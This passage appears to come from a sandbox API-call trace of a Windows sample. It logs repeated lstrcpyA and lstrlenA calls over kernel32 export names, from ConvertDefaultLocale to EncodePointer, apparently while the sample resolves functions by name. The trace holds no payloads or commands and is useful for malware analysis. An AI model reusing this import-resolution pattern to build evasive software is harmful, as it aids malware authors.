lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.773] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.773] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.773] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.773] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.773] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.773] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.773] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.773] lstrlenA (lpString="COPYFILEA") returned 9 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.773] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.773] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.773] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.773] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.773] lstrlenA (lpString="COPYFILEW") returned 9 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.773] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.773] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.773] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.773] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.773] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.773] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.774] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.774] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.774] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.774] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.774] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.774] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.774] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.774] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.774] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.774] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.774] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.774] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.774] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.774] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.774] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.774] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.774] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.774] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.774] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.774] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.775] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.775] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.775] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.775] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.775] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.775] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.775] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.775] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.775] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.775] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.775] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.775] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.775] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.775] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.775] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.775] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.775] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.775] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.775] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.776] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.776] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.776] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.776] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.776] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.776] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.776] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.776] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.776] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.776] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.776] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.776] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.776] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.776] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.776] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.776] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.776] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.776] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.777] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.777] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.777] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.777] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.777] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.777] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.777] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.777] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.777] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.777] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.777] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.777] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.777] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.777] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.777] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.777] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.777] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.777] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.778] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.778] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.778] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.778] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.778] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.778] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.778] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.778] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.778] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.778] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.778] lstrlenA (lpString="DELETEATOM") returned 10 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.778] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.778] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.778] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.778] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.778] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.778] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.778] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.778] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.779] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.779] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.779] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.779] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.779] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.779] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.779] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.779] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.779] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.779] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.779] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.779] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.779] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.779] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.779] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.779] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.779] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.779] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.779] lstrlenA (lpString="ENCODEPOINTER") 